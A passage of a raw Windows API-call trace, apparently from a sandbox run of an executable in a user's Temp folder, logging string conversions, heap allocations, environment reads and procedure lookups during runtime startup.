!\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f2e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ") returned 256 [0155.426] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ", cchWideChar=256, lpMultiByteStr=0x18fba0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÞ/f¤Üþ\x18", lpUsedDefaultChar=0x0) returned 256 [0155.564] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x0, Size=0x80) returned 0x246220 [0155.564] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fce8, nSize=0x105 | out: lpFilename="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\52B4.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\52b4.exe")) returned 0x2d [0155.565] GetProcAddress (hModule=0x769b0000, lpProcName="AreFileApisANSI") returned 0x76a44671 [0155.565] AreFileApisANSI () returned 1 [0155.565] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\52B4.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 46 [0155.565] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\52B4.exe", cchWideChar=-1, lpMultiByteStr=0x47d770, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\52B4.exe", lpUsedDefaultChar=0x0) returned 46 [0155.565] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x36) returned 0x2480e0 [0155.565] RtlInitializeSListHead (in: ListHead=0x47d210 | out: ListHead=0x47d210) [0155.565] GetLastError () returned 0x0 [0155.565] SetLastError (dwErrCode=0x0) [0155.565] GetEnvironmentStringsW () returned 0x249b48* [0155.565] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1443, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1443 [0155.565] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x0, Size=0x5a3) returned 0x24a698 [0155.565] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1443, lpMultiByteStr=0x24a698, cbMultiByte=1443, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=::=::\\", lpUsedDefaultChar=0x0) returned 1443 [0155.565] FreeEnvironmentStringsW (penv=0x249b48) returned 1 [0155.565] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x9c) returned 0x249b48 [0155.565] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x1f) returned 0x2498b0 [0155.565] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x2b) returned 0x246c88 [0155.565] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x37) returned 0x249bf0 [0155.565] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x3c) returned 0x249c30 [0155.565] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x31) returned 0x249c78 [0155.565] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x18) returned 0x248120 [0155.565] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x24) returned 0x246488 [0155.566] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x14) returned 0x2445e0 [0155.566] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0xd) returned 0x244768 [0155.566] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x1a) returned 0x2498d8 [0155.566] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x2e) returned 0x246cc0 [0155.566] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x19) returned 0x249900 [0155.566] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x17) returned 0x249cb8 [0155.566] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0xe) returned 0x244780 [0155.566] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x95) returned 0x249cd8 [0155.566] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x3e) returned 0x24ac60 [0155.566] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x1b) returned 0x249928 [0155.566] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x1d) returned 0x249950 [0155.566] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x48) returned 0x249d78 [0155.566] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x12) returned 0x249dc8 [0155.566] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x18) returned 0x249de8 [0155.566] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x1b) returned 0x249978 [0155.566] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x24) returned 0x2464b8 [0155.566] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x29) returned 0x246cf8 [0155.566] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x1e) returned 0x2499a0 [0155.566] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x6b) returned 0x249e08 [0155.566] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x17) returned 0x249e80 [0155.566] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x14) returned 0x249ea0 [0155.566] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0xf) returned 0x244798 [0155.566] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x16) returned 0x249ec0 [0155.566] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x2a) returned 0x246d30 [0155.566] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x29) returned 0x246d68 [0155.566] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x16) returned 0x249ee0 [0155.567] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x13) returned 0x249f00 [0155.567] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x1f) returned 0x2499c8 [0155.567] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x12) returned 0x249f20 [0155.567] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x18) returned 0x24bc60 [0155.567] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x46) returned 0x249f40 [0155.567] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x24a698 | out: hHeap=0x230000) returned 1 [0155.602] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x800) returned 0x24c448 [0155.602] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0155.638] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4071e3) returned 0x0 [0156.022] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x0, Size=0x8) returned 0x244600 [0156.022] LoadLibraryExW (lpLibFileName="api-ms-win-core-string-l1-1-0", hFile=0x0, dwFlags=0x800) returned 0x76fe0000 [0156.023] GetProcAddress (hModule=0x76fe0000, lpProcName="CompareStringEx") returned 0x77016a72 [0156.024] GetProcAddress (hModule=0x769b0000, lpProcName="EnumSystemLocalesEx") returned 0x76a447ef [0156.024] LoadLibraryExW (lpLibFileName="api-ms-win-core-datetime-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0156.024] GetLastError () returned 0x7e [0156.025] GetProcAddress (hModule=0x769b0000, lpProcName="GetDateFormatEx") returned 0x76a56c26 [0156.025] GetProcAddress (hModule=0x769b0000, lpProcName="GetLocaleInfoEx") returned 0x76a44cf1 [0156.026] GetProcAddress (hModule=0x769b0000, lpProcName="GetTimeFormatEx") returned 0x76a56ba1 [0156.026] GetProcAddress (hModule=0x769b0000, lpProcName="GetUserDefaultLocaleName") returned 0x76a44d61 [0156.027] GetProcAddress (hModule=0x769b0000, lpProcName="IsValidLocaleName") returned 0x76a44d81 [0156.027] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-obsolete-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0156.027] GetLastError () returned 0x7e [0156.028] GetProcAddress (hModule=0x769b0000, lpProcName="LCIDToLocaleName") returned 0x769ecec4 [0156.028] GetProcAddress (hModule=0x769b0000, lpProcName="LocaleNameToLCID") returned 0x76a44da1 [0156.028] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x0, Size=0x20) returned 0x24a468 [0156.028] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x0, Size=0x2) returned 0x248140 [0156.029] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x248140 | out: hHeap=0x230000) returned 1 [0156.029] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x0, Size=0x2) returned 0x248140 [0156.231] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x0, Size=0x8) returned 0x2462a8 [0156.231] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x0, Size=0x18) returned 0x24bc80 [0156.232] GetLastError () returned 0x7e [0156.232] SetLastError (dwErrCode=0x7e) [0156.232] GetLastError () returned 0x7e [0156.232] SetLastError (dwErrCode=0x7e) [0156.232] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0xb8) returned 0x24cc50 [0156.232] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x0, Size=0x6a6) returned 0x24cd10 [0156.233] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x24cd10 | out: hHeap=0x230000) returned 1 [0156.233] GetLastError () returned 0x7e [0156.233] SetLastError (dwErrCode=0x7e) [0156.233] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x0, Size=0x6) returned 0x24abd8 [0156.233] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x0, Size=0x2) returned 0x24abe8 [0156.234] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x4) returned 0x24abf8 [0156.234] GetLastError () returned 0x7e [0156.234] SetLastError (dwErrCode=0x7e) [0156.234] GetLastError () returned 0x7e [0156.234] SetLastError (dwErrCode=0x7e) [0156.234] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0xb8) returned 0x24cd10 [0156.234] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x0, Size=0x6a6) returned 0x24cdd0 [0156.234] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x24cdd0 | out: hHeap=0x230000) returned 1 [0156.234] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x24abd8 | out: hHeap=0x230000) returned 1 [0156.235] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x24cc50 | out: hHeap=0x230000) returned 1 [0156.235] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x24abf8 | out: hHeap=0x230000) returned 1 [0156.235] GetLastError () returned 0x7e [0156.235] SetLastError (dwErrCode=0x7e) [0156.235] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x0, Size=0x6) returned 0x24abd8 [0156.235] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x0, Size=0x2) returned 0x24abf8 [0156.235] GetLastError () returned 0x7e [0156.235] SetLastError (dwErrCode=0x7e) [0156.235] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x200) returned 0x24cdd0 [0156.235] GetLastError () returned 0x7e [0156.235] SetLastError (dwErrCode=0x7e) [0156.235] GetLastError () returned 0x7e [0156.235] SetLastError (dwErrCode=0x7e) [0156.235] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x4) returned 0x24ac08 [0156.235] GetLastError () returned 0x7e [0156.235] SetLastError (dwErrCode=0x7e) [0156.236] GetLastError () returned 0x7e [0156.236] SetLastError (dwErrCode=0x7e) [0156.236] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0xb8) returned 0x24cc50 [0156.236] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x0, Size=0x6a6) returned 0x24cfd8 [0156.236] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x24cfd8 | out: hHeap=0x230000) returned 1 [0156.236] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x24abd8 | out: hHeap=0x230000) returned 1 [0156.236] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x24cd10 | out: hHeap=0x230000) returned 1 [0156.236] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x24ac08 | out: hHeap=0x230000) returned 1 [0156.237] GetLastError () returned 0x7e [0156.237] SetLastError (dwErrCode=0x7e) [0156.237] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x0, Size=0x6) returned 0x24abd8 [0156.237] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x24abf8 | out: hHeap=0x230000) returned 1 [0156.237] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x24abe8 | out: hHeap=0x230000) returned 1 [0156.237] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x0, Size=0x8) returned 0x24abe8 [0159.712] GetLastError () returned 0x57 [0159.712] SetLastError (dwErrCode=0x57) [0159.787] GetLastError () returned 0x57 [0159.787] SetLastError (dwErrCode=0x57) [0159.787] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x1000) returned 0x24cfd8 [0159.787] GetLastError () returned 0x57 [0159.787] SetLastError (dwErrCode=0x57) [0159.787] GetLastError () returned 0x57 [0159.787] SetLastError (dwErrCode=0x57) [0159.787] GetLastError () returned 0x57 [0159.787] SetLastError (dwErrCode=0x57) [0159.787] GetLastError () returned 0x57 [0159.787] SetLastError (dwErrCode=0x57) [0159.788] GetLastError () returned 0x57 [0159.788] SetLastError (dwErrCode=0x57) [0159.788] GetLastError () returned 0x57 [0159.788] SetLastError (dwErrCode=0x57) [0159.788] GetLastError () returned 0x57 [0159.788] SetLastError (dwErrCode=0x57) [0159.788] GetLastError () returned 0x57 [0159.788] SetLastError (dwErrCode=0x57) [0159.788] GetLastError () returned 0x57 [0159.788] SetLastError (dwErrCode=0x57) [0159.788] GetLastError () returned 0x57 [0159.788] SetLastError (dwErrCode=0x57) [0159.788] GetLastError () returned 0x57 [0159.788] SetLastError (dwErrCode=0x57) [0159.789] GetLastError () returned 0x57 [0159.789] SetLastError (dwErrCode=0x57) [0159.789] GetLastError () returned 0x57 [0159.789] SetLastError (dwErrCode=0x57) [0159.789] GetLastError () returned 0x57 [0159.789] SetLastError (dwErrCode=0x57) [0159.789] GetLastError () returned 0x57 [0159.789] SetLastError (dwErrCode=0x57) [0159.789] GetLastError () returned 0x57 [0159.789] SetLastError (dwErrCode=0x57) [0159.789] GetLastError () returned 0x57 [0159.789] SetLastError (dwErrCode=0x57) [0159.789] GetLastError () returned 0x57 [0159.789] SetLastError (dwErrCode=0x57) [0159.790] GetLastError () returned 0x57 [0159.790] SetLastError (dwErrCode=0x57) [0159.790] GetLastError () returned 0x57 [0159.790] SetLastError (dwErrCode=0x57) [0159.790] GetLastError () returned 0x57 [0159.790] SetLastError (dwErrCode=0x57) [0159.790] GetLastError () returned 0x57 [0159.790] SetLastError (dwErrCode=0x57) [0159.790] GetLastError () returned 0x57 [0159.790] SetLastError (dwErrCode=0x57) [0159.790] GetLastError () returned 0x57 [0159.790] SetLastError (dwErrCode=0x57) [0159.790] GetLastError () returned 0x57 [0159.790] SetLastError (dwErrCode=0x57) [0159.791] GetLastError () returned 0x57 [0159.791] SetLastError (dwErrCode=0x57) [0159.791] GetLastError () returned 0x57 [0159.791] SetLastError (dwErrCode=0x57) [0159.791] GetLastError () returned 0x57 [0159.791] SetLastError (dwErrCode=0x57) [0159.791] GetLastError () returned 0x57 [0159.791] SetLastError (dwErrCode=0x57) [0159.791] GetLastError () returned 0x57 [0159.791] SetLastError (dwErrCode=0x57) [0159.791] GetLastError () returned 0x57 [0159.791] SetLastError (dwErrCode=0x57) [0159.791] GetLastError () returned 0x57 [0159.791] SetLastError (dwErrCode=0x57) [0159.791] GetLastError () returned 0x57 [0159.792] SetLastError (dwErrCode=0x57) [0159.792] GetLastError () returned 0x57 [0159.792] SetLastError (dwErrCode=0x57) [0159.792] GetLastError () returned 0x57 [0159.792] SetLastError (dwErrCode=0x57) [0159.792] GetLastError () returned 0x57 [0159.792] SetLastError (dwErrCode=0x57) [0159.792] GetLastError () returned 0x57 [0159.792] SetLastError (dwErrCode=0x57) [0159.792] GetLastError () returned 0x57 [0159.792] SetLastError (dwErrCode=0x57) [0159.792] GetLastError () returned 0x57 [0159.792] SetLastError (dwErrCode=0x57) [0159.792] GetLastError () returned 0x57 [0159.792] SetLastError (dwErrCode=0x57) [0159.793] GetLastError () returned 0x57 [0159.793] SetLastError (dwErrCode=0x57) [0159.793] GetLastError () returned 0x57 [0159.793] SetLastError (dwErrCode=0x57) [0159.793] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x0, Size=0x8) returned 0x24abf8 [0159.793] GetLastError () returned 0x57 [0159.793] SetLastError (dwErrCode=0x57) [0159.793] GetLastError () returned 0x57 [0159.793] SetLastError (dwErrCode=0x57) [0159.793] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0xb8) returned 0x24cd10 [0159.793] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x0, Size=0x6a6) returned 0x24dfe8 [0160.124] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x24dfe8 | out: hHeap=0x230000) returned 1 [0160.125] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x24abd8 | out: hHeap=0x230000) returned 1 [0160.125] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x24cc50 | out: hHeap=0x230000) returned 1 [0160.125] GetLastError () returned 0x57 [0160.125] SetLastError (dwErrCode=0x57) [0160.125] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x0, Size=0x6) returned 0x24abd8 [0160.125] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x0, Size=0x2) returned 0x24ac08 [0160.125] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x4) returned 0x24ac18 [0160.125] GetLastError () returned 0x57 [0160.125] SetLastError (dwErrCode=0x57) [0160.125] GetLastError () returned 0x57 [0160.125] SetLastError (dwErrCode=0x57) [0160.125] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0xb8) returned 0x24cc50 [0160.126] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x0, Size=0x6a6) returned 0x24dfe8 [0160.126] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x24dfe8 | out: hHeap=0x230000) returned 1 [0160.126] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x24abd8 | out: hHeap=0x230000) returned 1 [0160.126] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x24cd10 | out: hHeap=0x230000) returned 1 [0160.126] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x24ac18 | out: hHeap=0x230000) returned 1 [0160.126] GetLastError () returned 0x57 [0160.126] SetLastError (dwErrCode=0x57) [0160.126] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x0, Size=0x6) returned 0x24abd8 [0160.126] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x0, Size=0x2) returned 0x24ac18 [0160.126] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x4) returned 0x24ac28 [0160.126] GetLastError () returned 0x57 [0160.126] SetLastError (dwErrCode=0x57) [0160.126] GetLastError () returned 0x57 [0160.127] SetLastError (dwErrCode=0x57) [0160.127] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0xb8) returned 0x24cd10 [0160.127] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x0, Size=0x6a6) returned 0x24dfe8 [0160.127] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x24dfe8 | out: hHeap=0x230000) returned 1 [0160.127] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x24abd8 | out: hHeap=0x230000) returned 1 [0160.127] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x24cc50 | out: hHeap=0x230000) returned 1 [0160.127] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x24ac28 | out: hHeap=0x230000) returned 1 [0160.127] GetLastError () returned 0x57 [0160.127] SetLastError (dwErrCode=0x57) [0160.127] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x0, Size=0x6) returned 0x24abd8 [0160.128] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x24ac18 | out: hHeap=0x230000) returned 1 [0160.128] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x24ac08 | out: hHeap=0x230000) returned 1 [0160.128] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x0, Size=0x8) returned 0x24ac08 [0160.189] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x0, Size=0x18) returned 0x24bca0 [0160.189] GetLastError () returned 0x57 [0160.189] SetLastError (dwErrCode=0x57) [0160.189] GetLastError () returned 0x57 [0160.189] SetLastError (dwErrCode=0x57) [0160.189] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0xb8) returned 0x24cc50 [0160.189] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x0, Size=0x6a6) returned 0x24dfe8 [0160.190] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x24dfe8 | out: hHeap=0x230000) returned 1 [0160.190] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x24abd8 | out: hHeap=0x230000) returned 1 [0160.190] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x24cd10 | out: hHeap=0x230000) returned 1 [0160.190] GetLastError () returned 0x57 [0160.190] SetLastError (dwErrCode=0x57) [0160.190] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x0, Size=0x6) returned 0x24abd8 [0160.190] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x0, Size=0x2) returned 0x24ac18 [0160.190] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x4) returned 0x24ac28 [0160.190] GetLastError () returned 0x57 [0160.190] SetLastError (dwErrCode=0x57) [0160.190] GetLastError () returned 0x57 [0160.190] SetLastError (dwErrCode=0x57) [0160.190] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0xb8) returned 0x24cd10 [0160.190] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x0, Size=0x6a6) returned 0x24dfe8 [0160.191] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x24dfe8 | out: hHeap=0x230000) returned 1 [0160.191] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x24abd8 | out: hHeap=0x230000) returned 1 [0160.191] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x24cc50 | out: hHeap=0x230000) returned 1 [0160.191] HeapFree (in: hHeap=0x230000, dwFlags=0x0, lpMem=0x24ac28 | out: hHeap=0x230000) returned 1 [0160.191] GetLastError () returned 0x57 [0160.191] SetLastError (dwErrCode=0x57) [0160.191] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x0, Size=0x6) returned 0x24abd8 [0160.191] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x0, Size=0x2) returned 0x24ac28 [0160.191] GetLastError () returned 0x57 [0160.191] SetLastError (dwErrCode=0x57) [0160.191] GetLastError () returned 0x57 [0160.191] SetLastError (dwErrCode=0x57) [0160.191] GetLastError () returned 0x57 [0160.192] SetLastError (dwErrCode=0x57) [0160.192] GetLastError () returned 0x57 [0160.192] SetLastError (dwErrCode=0x57) [0160.192] GetLastError () returned 0x57 [0160.192] SetLastError (dwErrCode=0x57) [0160.192] GetLastError () returned 0x57 [0160.192] SetLastError (dwErrCode=0x57) [0160.192] GetLastError () returned 0x57 [0160.192] SetLastError (dwErrCode=0x57) [0160.192] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x8, Size=0x1) returned 0x24ac38 [0160.192] RtlAllocateHeap 